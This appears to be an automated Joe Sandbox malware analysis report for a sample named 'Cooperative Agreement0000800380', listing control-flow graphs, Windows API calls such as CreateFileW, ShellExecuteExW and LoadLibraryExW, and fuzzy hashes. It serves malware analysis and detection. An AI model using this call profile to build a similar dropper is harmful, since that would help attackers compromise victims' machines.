                                                                                                                                                                                                                                          • Part of subcall function 00405492: CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                                                                                                                                                                                                                          • Part of subcall function 00405492: LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
                                                                                                                                                                                                                                        • String ID: *pA$*pA$pA
                                                                                                                                                                                                                                        • API String ID: 1881381519-978732049
                                                                                                                                                                                                                                        • Opcode ID: bf419ecd053125aa4cc63fae941d4f4937ceb88770c1d79b13fa06698ce42480
                                                                                                                                                                                                                                        • Instruction ID: c37fc5d70f496ddafb25d76fc072764247fdd107690a54ecab0fee76e679e4b9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf419ecd053125aa4cc63fae941d4f4937ceb88770c1d79b13fa06698ce42480
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 452219B5504700AED200BBB2D981A7F77BDEB94709F10CD3FF544AA192CA3CD8499B69

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 510 40aac0-40aad6 511 40aae0-40aaf3 call 40d498 510->511 512 40aad8 510->512 515 40aca2-40acab 511->515 516 40aaf9-40ab00 511->516 512->511 517 40ab02-40ab0a 516->517 518 40ab3e-40ab41 516->518 519 40ab11-40ab17 517->519 520 40ab0c 517->520 521 40ab43-40ab4b 518->521 522 40ab7c-40ab7f 518->522 523 40ab19 519->523 524 40ab1c-40ab39 CreateFileW 519->524 520->519 525 40ab52-40ab58 521->525 526 40ab4d 521->526 527 40ab81-40ab8d 522->527 528 40abe8 522->528 523->524 531 40abec-40abef 524->531 532 40ab5a 525->532 533 40ab5d-40ab7a CreateFileW 525->533 526->525 529 40ab98-40ab9e 527->529 530 40ab8f-40ab94 527->530 528->531 534 40aba0-40aba3 529->534 535 40aba7-40abc7 CreateFileW 529->535 530->529 536 40abf5-40abf7 531->536 537 40ac8b 531->537 532->533 533->531 534->535 535->536 538 40abc9-40abe6 CreateFileW 535->538 536->537 540 40abfd-40ac04 536->540 539 40ac8f-40ac92 537->539 538->531 541 40ac94 539->541 542 40ac96-40ac9d call 40d40a 539->542 543 40ac22 540->543 544 40ac06-40ac0c 540->544 541->542 542->515 547 40ac25-40ac52 543->547 544->543 546 40ac0e-40ac20 HeapAlloc 544->546 546->547 548 40ac70-40ac79 547->548 549 40ac54-40ac5a 547->549 550 40ac7b 548->550 551 40ac7d-40ac7f 548->551 549->548 552 40ac5c-40ac6a SetFilePointer 549->552 550->551 551->539 553 40ac81-40ac8a 551->553 552->548
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB31
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB72
                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040ABBC
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040ABDE
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040AC17
                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC6A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$Create$AllocHeapPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4207849991-0
                                                                                                                                                                                                                                        • Opcode ID: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
                                                                                                                                                                                                                                        • Instruction ID: b1ded5e7b3c1179952fb066da43177db28dec5f90817629197f40925782b5e59
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F51C0712483006BE3218F19DD44B6B7BF6EB44764F204A3AFA51A73E0D678EC55874A

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 554 40d819-40d838 555 40d83a-40d83c 554->555 556 40d83e-40d840 554->556 555->556 557 40d8f2-40d905 RtlAllocateHeap 556->557 558 40d846-40d869 call 40da43 EnterCriticalSection 556->558 560 40d907-40d925 557->560 561 40d93d-40d943 557->561 565 40d877-40d879 558->565 563 40d930-40d937 InitializeCriticalSection 560->563 564 40d927-40d929 560->564 563->561 564->563 566 40d92b-40d92e 564->566 567 40d86b-40d86e 565->567 568 40d87b 565->568 566->561 569 40d870-40d873 567->569 570 40d875 567->570 571 40d887-40d89b HeapAlloc 568->571 569->570 572 40d87d-40d885 569->572 570->565 573 40d8e5-40d8f0 LeaveCriticalSection 571->573 574 40d89d-40d8b8 call 40d819 571->574 572->571 572->573 573->561 574->573 577 40d8ba-40d8da 574->577 578 40d8dc 577->578 579 40d8df 577->579 578->579 579->573
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00418624,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D85A
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040D891
                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00418624,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D8EA
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D8FB
                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D937
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1272335518-0
                                                                                                                                                                                                                                        • Opcode ID: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
                                                                                                                                                                                                                                        • Instruction ID: b7a84fb5e76b6252515cea3da09f74f38e7866411a6d0cfbb28ace0a8fd55691
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B31AEB2E007069FC3209F95D844A56BBF5FB44714B15C67EE465A77A0CB38E908CF98

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 580 402022-402024 581 402029-402034 580->581 581->581 582 402036-4020ac call 40dfc0 call 405060 * 3 ShellExecuteExW 581->582 591 4020b0-4020cd call 405532 GetExitCodeProcess 582->591 594 4020dd 591->594 595 4020cf-4020d9 591->595 594->591 595->594 596 4020db-402106 call 40df50 * 3 595->596
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 004020A7
                                                                                                                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 004020C6
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CodeExecuteExitProcessShell
                                                                                                                                                                                                                                        • String ID: open
                                                                                                                                                                                                                                        • API String ID: 1016612177-2758837156
                                                                                                                                                                                                                                        • Opcode ID: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
                                                                                                                                                                                                                                        • Instruction ID: 2b8263a944a9b57d4591781c670f1b736d97a98816e9e989756960c1ab26e777
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66219D71008309AFD700EF54C855A9FBBE8EF44304F10882EF299E2291DB79D909CF96

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                                          • Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                                                                                                                                                                                                                          • Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
                                                                                                                                                                                                                                          • Part of subcall function 00409698: memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA
                                                                                                                                                                                                                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                                                                                                                                                                                                                                        • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                                                                                                                                                                                                                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 983379767-0
                                                                                                                                                                                                                                        • Opcode ID: 6d644cda50eb4bb59354e9275524eabcad73a702f0dc48a96d1c9a3a24c112bc
                                                                                                                                                                                                                                        • Instruction ID: 657320b8a0b9e8c73ad23a805e8a4a11547555e009ba7fb8d64ba55fc2021fd8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d644cda50eb4bb59354e9275524eabcad73a702f0dc48a96d1c9a3a24c112bc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22514AB59047007AE2007BB2DD82E7F66AEDBD4709F10893FF944790D2C93C984996AE

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 749 40b020-40b034 750 40b127-40b12d 749->750 751 40b03a-40b03e 749->751 752 40b040-40b068 SetFilePointer 751->752 753 40b06b-40b075 751->753 752->753 754 40b077-40b082 753->754 755 40b0e8-40b0f3 call 40aa40 753->755 756 40b0d3-40b0e5 754->756 757 40b084-40b085 754->757 764 40b115-40b122 755->764 765 40b0f5-40b112 WriteFile 755->765 759 40b087-40b08a 757->759 760 40b0bc-40b0d0 757->760 762 40b0a7-40b0b9 759->762 763 40b08c-40b08d 759->763 766 40b091-40b0a4 memcpy 763->766 764->766
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B058
                                                                                                                                                                                                                                        • memcpy.MSVCRT(?,?,?,?,00000001), ref: 0040B092
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FilePointermemcpy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1104741977-0
                                                                                                                                                                                                                                        • Opcode ID: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                                                                                                                                                                                                                                        • Instruction ID: 223037c69186752c1411635bf46ae5d03fa463101b4e1ddb65380de8071f5603
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93313A392047019FC320DF29D844E5BB7E1EFD4314F04882EE59A97750D335E919CBA6

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 767 40dec0-40dee7 TlsGetValue 768 40df06-40df25 RtlReAllocateHeap 767->768 769 40dee9-40df04 RtlAllocateHeap 767->769 770 40df27-40df4d call 40e3a0 768->770 769->770
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(02390000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap$Value
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2497967046-0
                                                                                                                                                                                                                                        • Opcode ID: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                                                                                                                                                                                                                                        • Instruction ID: 93a72ebc0765164a1c418c05f64e83f02c193a946cd328b9657e87a1490d81f0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F111B974A00208EFCB04DF98D894E9ABBB6FF88314F20C159F9099B355D735AA41DB94

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 773 40a6c5-40a6d2 774 40a6d4-40a706 wcsncpy wcslen 773->774 775 40a73d 773->775 776 40a71e-40a726 774->776 777 40a73f-40a742 775->777 778 40a708-40a70f 776->778 779 40a728-40a73b CreateDirectoryW 776->779 780 40a711-40a714 778->780 781 40a71b 778->781 779->777 780->781 782 40a716-40a719 780->782 781->776 782->779 782->781
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDirectorywcslenwcsncpy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 961886536-0
                                                                                                                                                                                                                                        • Opcode ID: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                                                                                                                                                                                                                                        • Instruction ID: 5eb92d4f139d310a1ce384b3b75a423d404f976685da56e70024377017fd7883
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E0167B180131896CB24DB64CC8DEBA73B8DF04304F6086BBE415E71D1E779DAA4DB5A

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 783 408dee-408e26 memset InitCommonControlsEx CoInitialize
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00408DFB
                                                                                                                                                                                                                                        • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00408E1D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CommonControlsInitInitializememset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2179856907-0
                                                                                                                                                                                                                                        • Opcode ID: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                                                                                                                                                                                                                                        • Instruction ID: d18f3e268914b4fee2ab689e9e6bda8f6ab82eec5aee9dd7765ec6ce908ab83c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12E08CB088430CBBEB009BD0DC0EF8DBB7CEB00315F0041A4F904A2280EBB466488B95

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 784 4098c0-4098c5 785 4098c7-4098cd 784->785 786 4098df 784->786 787 4098d4-4098d9 SetEnvironmentVariableW 785->787 788 4098cf 785->788 787->786 788->787
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetEnvironmentVariableW.KERNELBASE(02399740,02399740,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                                                                                                                                        • String ID: $0A
                                                                                                                                                                                                                                        • API String ID: 1431749950-513306843
                                                                                                                                                                                                                                        • Opcode ID: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
                                                                                                                                                                                                                                        • Instruction ID: a83057451cf148fd94e5dae0918d05dd15dd477b401c26288c9a060c20ad275f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7C01231619201BBD710EA14C904B57BBE5EB50345F04C439B044912B0C338CC44D705

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 789 40adc0-40add9 call 40d498 792 40ae6e-40ae73 789->792 793 40addf-40adfe CreateFileW 789->793 794 40ae00-40ae02 793->794 795 40ae52-40ae55 793->795 794->795 796 40ae04-40ae0b 794->796 797 40ae57 795->797 798 40ae59-40ae60 call 40d40a 795->798 800 40ae20 796->800 801 40ae0d-40ae1e HeapAlloc 796->801 797->798 802 40ae65-40ae6b 798->802 803 40ae23-40ae4a 800->803 801->803 804 40ae4c 803->804 805 40ae4e-40ae50 803->805 804->805 805->795 805->802
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040D498: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
